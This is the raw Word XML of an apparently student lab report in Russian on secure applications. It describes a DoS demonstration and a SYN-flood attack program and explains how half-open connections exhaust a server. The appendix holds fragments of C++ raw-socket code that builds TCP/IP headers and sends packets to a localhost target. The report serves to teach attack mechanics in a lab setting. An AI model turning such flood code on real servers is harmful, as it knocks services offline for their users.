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3A8305D4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9B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ети. Основы безопасности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71A267CC" w:rsidR="007320FE" w:rsidRPr="00056E3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</w:t>
      </w:r>
      <w:r w:rsidR="00056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56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056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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E244C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72E8F8D" w14:textId="77777777" w:rsidR="00737868" w:rsidRPr="001277C5" w:rsidRDefault="0073786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07308E" w14:textId="10CE4223" w:rsidR="00F36C30" w:rsidRDefault="00056E35" w:rsidP="00056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ЗАЩИЩЁННЫХ ПРИЛОЖЕНИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E13AE" w14:textId="77777777" w:rsidR="009B10F7" w:rsidRDefault="009B10F7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E1001" w14:textId="77777777" w:rsidR="00056E35" w:rsidRPr="00056E35" w:rsidRDefault="00056E35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330A606" w14:textId="77777777" w:rsidR="00102ACB" w:rsidRDefault="00102ACB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3D440488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5703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Скворцов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C3781" w14:textId="77777777" w:rsidR="00737868" w:rsidRDefault="00737868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653F2" w14:textId="4103AAC4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щ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ADE3F98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A9F7B" w14:textId="530515DD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49382" w14:textId="673B9BFF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C6132" w14:textId="4589BA05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21AAD" w14:textId="77777777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555D19BC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9B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3B9A3C33" w14:textId="5EB6F592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2BF7C5FF" w14:textId="77777777" w:rsidR="002317CB" w:rsidRPr="002317CB" w:rsidRDefault="002317CB" w:rsidP="002317CB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1D77F5F" w14:textId="6F098E18" w:rsidR="009722AB" w:rsidRPr="009722AB" w:rsidRDefault="00FF17FC" w:rsidP="003279EA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722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722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722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0192830" w:history="1">
            <w:r w:rsidR="009722AB"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2830 \h </w:instrTex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E20DA" w14:textId="3A75B9ED" w:rsidR="009722AB" w:rsidRPr="009722AB" w:rsidRDefault="00000000" w:rsidP="003279EA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192831" w:history="1">
            <w:r w:rsidR="009722AB"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9722AB"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 выполнения</w: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2831 \h </w:instrTex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F0DA8" w14:textId="011AECC9" w:rsidR="009722AB" w:rsidRPr="009722AB" w:rsidRDefault="00000000" w:rsidP="003279EA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192832" w:history="1">
            <w:r w:rsid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9722AB"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2832 \h </w:instrTex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BC44B" w14:textId="16B8252C" w:rsidR="009722AB" w:rsidRPr="009722AB" w:rsidRDefault="00000000" w:rsidP="003279EA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192833" w:history="1">
            <w:r w:rsid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722AB"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риложение </w:t>
            </w:r>
            <w:r w:rsid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9722AB"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</w:t>
            </w:r>
            <w:r w:rsid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 w:rsidR="009722AB"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тинг кода</w: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2833 \h </w:instrTex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19E6380E" w:rsidR="00FF17FC" w:rsidRDefault="00FF17FC" w:rsidP="003279EA">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
          </w:pPr>
          <w:r w:rsidRPr="009722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386BE25" w:rsidR="00DB5A23" w:rsidRPr="00C133C7" w:rsidRDefault="00C133C7" w:rsidP="00C133C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6019283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1DB1CB83" w14:textId="77777777" w:rsidR="00417577" w:rsidRPr="00C133C7" w:rsidRDefault="00417577" w:rsidP="00A75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10C4E" w14:textId="5FC69D8A" w:rsidR="00056E35" w:rsidRDefault="00005703" w:rsidP="00056E35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</w:t>
      </w:r>
      <w:r w:rsidR="00C133C7" w:rsidRPr="00C133C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аборат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133C7" w:rsidRPr="00C133C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ы нужно </w:t>
      </w:r>
      <w:r w:rsidR="00C133C7" w:rsidRPr="00C133C7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C133C7" w:rsidRPr="00C133C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программное средство, которое представляет собой десктопное приложение, позволяющее пользователю вводить логин и пароль и в зависимости от своей роли видеть определенные данные из базы данных. Приложение должно быть защищено от разного рода атак, таких </w:t>
      </w:r>
      <w:r w:rsidR="00056E3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56E35" w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">инъекции, </w:t>
      </w:r>
      <w:r w:rsidR="00056E35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="00056E35" w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B181B4" w14:textId="330999E5" w:rsidR="00056E35" w:rsidRPr="00056E35" w:rsidRDefault="00056E35" w:rsidP="00056E35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олжен быть разработан инсталлятор данного приложения, который запрещает несанкционированное распространение продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0D867" w14:textId="77777777" w:rsidR="00056E35" w:rsidRDefault="00056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B2A6B0" w14:textId="77777777" w:rsidR="001D6220" w:rsidRDefault="001D6220" w:rsidP="00056E35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7E812" w14:textId="774DF614" w:rsidR="00CB068D" w:rsidRDefault="00512B31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60192831"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>РЕЗУЛЬТАТ ВЫПОЛНЕНИЯ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="6F51DF13" w14:textId="3C65E5E0" w:rsidR="000577C6" w:rsidRPr="00512B31" w:rsidRDefault="000577C6" w:rsidP="0051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8588C4" w14:textId="23D166E5" w:rsidR="00A32D85" w:rsidRPr="00737868" w:rsidRDefault="00D61136" w:rsidP="007605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было создано </w:t>
      </w:r>
      <w:r w:rsidR="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">две программы, первая из которых реализована в виде клиент-серверного приложения, где клиент является злоумышленником, проводящим </w:t>
      </w:r>
      <w:r w:rsidR="007605C8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="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаку на сервер</w:t>
      </w:r>
      <w:r w:rsidR="00737868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сервер выдерживает определенное количество запросов, потом перестает отвечать, т.к. был достигнут лимит подключений и сервер «упал» в ошибку (рисунок 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA629F3" w14:textId="77777777" w:rsidR="00A32D85" w:rsidRPr="00DF4D73" w:rsidRDefault="00A32D85" w:rsidP="007605C8">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7B5D7D" w14:textId="77777777" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605C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bookmarkStart w:id="2" w:name="_Toc160192832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia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7F8F9789" wp14:editId="1D2F4705">
            <wp:extent cx="4390476" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1260140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40073" name="Рисунок 12601400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88B7" w14:textId="77777777" w:rsidR="007605C8" w:rsidRPr="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605C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44AA4E8" w14:textId="7EA543E0" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605C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605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1 – Последствия </w:t>
      </w:r>
      <w:r w:rsidRPr="007605C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oS</w:t>
      </w:r>
      <w:r w:rsidRPr="007605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атак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сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA7F59" w14:textId="77777777" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605C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99FD93F" w14:textId="77D72908" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На следующем рисунке можно видеть, что после определенного количества подключений сервер перестал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрабатывать новые подключения и, соответственно,</w:t>
      </w:r>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> отвечать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">клиенту. Так как клиент </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выполнил свою цель, то клиентская часть программы завершила свою работу </w:t>
      </w:r>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(рисунок 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A41E0E" w14:textId="77777777" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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AB3BB" w14:textId="7278E7D9" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236356B6" wp14:editId="27265A88">
            <wp:extent cx="4390476" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2746577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57743" name="Рисунок 2746577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AA50" w14:textId="77777777" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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A71064" w14:textId="1F493ED6" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605C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605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7605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605C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oS</w:t>
      </w:r>
      <w:r w:rsidRPr="007605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ата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в клиенте</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657E630" w14:textId="77777777" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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887B3" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="007605C8" w:rsidP="007605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C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вторая программа является реализацией SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки, </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">принцип работы которой заключается в следующем: </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>злоумышленник</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в данном случае клиент)</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> посылает огромное количество запросов установки соединения на атакуемый сервер. Сервер, видя сегменты с флагом SYN, выделяет необходимые ресурсы для поддержания соединения и отправляет в ответ </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>сегменты с флагами SYN и ACK, переходя в состояние SYN-RECEIVED (такое состояние еще называют полуоткрытым соединением).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996C107" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7" w:rsidP="007605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5B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Злоумышленник, не шлет ответные ACK сегменты, а продолжает бомбардировать сервер SYN-запросами, тем самым вынуждая сервер создавать все больше и больше полуоткрытых соединений. Сервер, понятное дело, располагает ограниченными ресурсами, и потому имеет лимит на количество полуоткрытых соединений. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8CA7F" w14:textId="0EF7C042" w:rsidR="00A665B7" w:rsidRDefault="00A665B7" w:rsidP="007605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5B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввиду этой ограниченности, при достижении предельного числа полуоткрытых соединений сервер начинает отклонять новые попытки соединения; таким образом и достигается отказ в обслуживании</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В случае реализации программы, сервер просто видит, что соединения продолжаются, но не может на них ответить ввиду неработоспособности (рисунок 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619CDC7" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7" w:rsidP="007605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7CEBC3" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="007605C8" w:rsidP="00A665B7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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B96CB51" wp14:editId="5292D3CF">
            <wp:extent cx="3997960" cy="2314572"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5088407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40753" name="Рисунок 50884075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" b="11777"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000000" cy="2315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64E04" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7" w:rsidP="00A665B7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7B03ED2B" w14:textId="173477C1" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7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605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7605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YN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A665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lood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A665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605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та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</w:p>
    <w:p w14:paraId="1780BD24" w14:textId="466D4ED6" w:rsidR="007605C8" w:rsidRPr="007605C8" w:rsidRDefault="007605C8" w:rsidP="00A665B7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 w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F58C50" w14:textId="0D086E6B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2"/>
    </w:p>
    <w:p w14:paraId="236AA356" w14:textId="77777777" w:rsidR="00C92CAA" w:rsidRPr="00C92CAA" w:rsidRDefault="00C92CAA" w:rsidP="00A7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45742" w14:textId="0866AF25" w:rsidR="00FD65AD" w:rsidRDefault="00FD65AD" w:rsidP="00FD65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AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В результате выполнения данной лабораторной работы были разработан</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD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A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ые</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65A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665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7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A665B7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="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-атаки и </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD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7E12C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С++</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65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110D38" w14:textId="6A6BA2EF" w:rsidR="00FD65AD" w:rsidRPr="009722AB" w:rsidRDefault="009722AB" w:rsidP="00FD65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проведено изучение протокола </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7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A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и транспортного уровня, рассмотрены наиболее частые примеры атак на этот протокол.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA1C7F" w14:textId="77777777" w:rsidR="00FD65AD" w:rsidRDefault="00FD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6019283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3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0D559A7B" w:rsidR="00E74A5C" w:rsidRPr="00102ACB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02ACB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 –</w:t>
      </w:r>
      <w:r w:rsidR="00F53E03" w:rsidRPr="00102ACB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0157F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файл</w:t>
      </w:r>
      <w:r w:rsidR="00F0157F" w:rsidRPr="00102ACB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7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</w:t>
      </w:r>
      <w:r w:rsidR="00F0157F" w:rsidRPr="00102ACB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71040C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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26AF66DC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pa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et.h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3209DF03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tine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.h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3FBD4ECE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tine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.h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5C851112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tine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p.h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7ECD061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hread.h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53030835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.h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365EB38B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ys/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.h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6A1AB09D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istd.h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1CF65E10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835C49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atomic&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74783981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4342F3AA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emory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A8683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2F5753EA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3B0974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libs/utils.cpp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E691FD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7B717F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_clien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1BE0621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FDF688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omic&lt;long long&gt; G_ACK_CNT(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E79160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omic&lt;long long&gt; G_SYN_CNT(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC10524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EEF3E6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_connected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010F6C6A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BED847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*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p_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k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*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g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F7BF75A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har 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gram[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4096],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rce_ip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32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD4203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6A52EB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cpy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rce_ip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"127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBD570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se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gram, 0, 4096);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738223F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86AEC3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uct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_in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n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB73E9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CAA244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n.sin_family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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBFBE7B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n.sin_por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ns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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB3BDE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n.sin_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r.s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add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et_add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rce_ip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2347C8E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9B234F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auto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h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IPHeade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atagram,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rce_ip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in);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A671BA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auto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ph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TCPHeade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atagram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1065D938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ph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ack = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AFB5B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99ACE0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auto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h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FakeHeade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rce_ip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in);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89C68B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92B30A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cpy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h.tcp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ph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truct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phd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49EB59BA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DE1F44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ph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-&gt;check = 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sum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unsigned short *)&amp;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h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keHeade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386266B8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0B73B7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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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_clien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datagram,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len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atagram), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C630945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679B71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  <w:t>G_ACK_CNT++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C33629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ACK №" &lt;&lt; G_ACK_CNT &lt;&lt; "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ed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 &lt;&lt; std::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701A354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har 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[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000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E39E97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47CEDC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size_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= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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v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1, msg, 4000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7BD1E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hread_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i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1B7EF0A8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FE31ED1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222432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*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eive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*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g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3D37E22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har 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[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000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139AD4D1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E31025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true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF3A73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size_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= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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v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_clien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msg, 4000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA233E8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7FAE14DB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err &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546323FF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[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999] = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68D303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741114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_SYN_CNT++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFF0D3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Connection SYN №" &lt;&lt; G_SYN_CNT &lt;&lt; " received" &lt;&lt; std::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386B036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5122CE20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hread_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read;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A788B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hread_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thread, NULL,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p_shk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26FF3AF3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8853693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8B6505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err == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF2C76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424974D2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71380D8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42AF2A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err == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346D026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_error_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, "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v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3EAC1F3E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C375467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1ADED2E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70B7A2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hread_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i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074184FE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797AE28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0122FB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gc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har **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gv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3A7A0C4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CF7824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hread_attr_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t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240B726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BEFDE0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err =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hread_attr_ini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t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1E743E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5E6C7B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 !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0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D746B33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_error_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, "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hread_attr_ini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36414611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129B90B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AC9DAF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_desc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F_INET, SOCK_STREAM, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A0F60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9CC225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_desc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-1) {</w:t>
      </w:r>
    </w:p>
